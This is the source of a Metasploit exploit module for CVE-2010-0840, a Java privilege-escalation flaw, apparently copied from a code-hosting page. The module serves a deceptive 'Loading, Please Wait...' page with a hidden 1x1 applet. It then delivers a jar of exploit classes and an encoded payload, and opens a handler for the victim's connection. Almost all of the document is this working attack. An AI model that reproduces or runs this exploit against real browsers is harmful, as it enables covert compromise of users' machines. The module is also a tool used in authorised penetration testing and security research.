Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # Superceded by java_atomicreferencearray
12
  #include Msf::Exploit::Remote::BrowserAutopwn
13
  #autopwn_info({ :javascript => false })
14

15
  def initialize( info = {} )
16

17
    super( update_info( info,
18
      'Name'          => 'Java Statement.invoke() Trusted Method Chain Privilege Escalation',
19
      'Description'   => %q{
20
      This module exploits a vulnerability in Java Runtime Environment
21
      that allows an untrusted method to run in a privileged context.  The
22
      vulnerability affects version 6 prior to update 19 and version 5
23
      prior to update 23.
24
      },
25
      'License'       => MSF_LICENSE,
26
      'Author'        => [
27
        'Sami Koivu', # Discovery
28
        'Matthias Kaiser', # PoC
29
        'egypt' # metasploit module
30
      ],
31
      'References'    =>
32
      [
33
        [ 'CVE', '2010-0840' ],
34
        [ 'OSVDB', '63483' ],
35
        [ 'URL', 'http://slightlyrandombrokenthoughts.blogspot.com/2010/04/java-trusted-method-chaining-cve-2010.html' ],
36
      ],
37
      'Platform'      => %w{ java linux win },
38
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
39
      'Targets'       =>
40
        [
41
          [ 'Generic (Java Payload)',
42
            {
43
              'Arch' => ARCH_JAVA,
44
            }
45
          ],
46
          [ 'Windows Universal',
47
            {
48
              'Arch' => ARCH_X86,
49
              'Platform' => 'win'
50
            }
51
          ],
52
          [ 'Linux x86',
53
            {
54
              'Arch' => ARCH_X86,
55
              'Platform' => 'linux'
56
            }
57
          ]
58
        ],
59
      'DefaultTarget'  => 0,
60
      'DisclosureDate' => '2010-03-31'
61
      ))
62
  end
63

64

65
  def on_request_uri( cli, request )
66
    if not request.uri.match(/\.jar$/i)
67
      if not request.uri.match(/\/$/)
68
        send_redirect(cli, get_resource() + '/', '')
69
        return
70
      end
71

72
      print_status("#{self.name} handling request")
73

74
      send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
75
      return
76
    end
77

78
    paths = [
79
      [ "vuln", "Exploit.class" ],
80
      [ "vuln", "Exploit$1.class" ],
81
      [ "vuln", "Link.class" ],
82
    ]
83

84
    p = regenerate_payload(cli)
85

86
    jar  = p.encoded_jar
87
    paths.each do |path|
88
      1.upto(path.length - 1) do |idx|
89
        full = path[0,idx].join("/") + "/"
90
        if !(jar.entries.map{|e|e.name}.include?(full))
91
          jar.add_file(full, '')
92
        end
93
      end
94
      fd = File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2010-0840", path ), "rb")
95
      data = fd.read(fd.stat.size)
96
      jar.add_file(path.join("/"), data)
97
      fd.close
98
    end
99

100
    print_status( "Sending Applet.jar" )
101
    send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
102

103
    handler( cli )
104
  end
105

106
  def generate_html
107
    html  = "<html><head><title>Loading, Please Wait...</title></head>"
108
    html += "<body><center><p>Loading, Please Wait...</p></center>"
109
    html += "<applet archive=\"Exploit.jar\" code=\"vuln.Exploit.class\" width=\"1\" height=\"1\">"
110
    html += "</applet></body></html>"
111
    return html
112
  end
113
end
114

115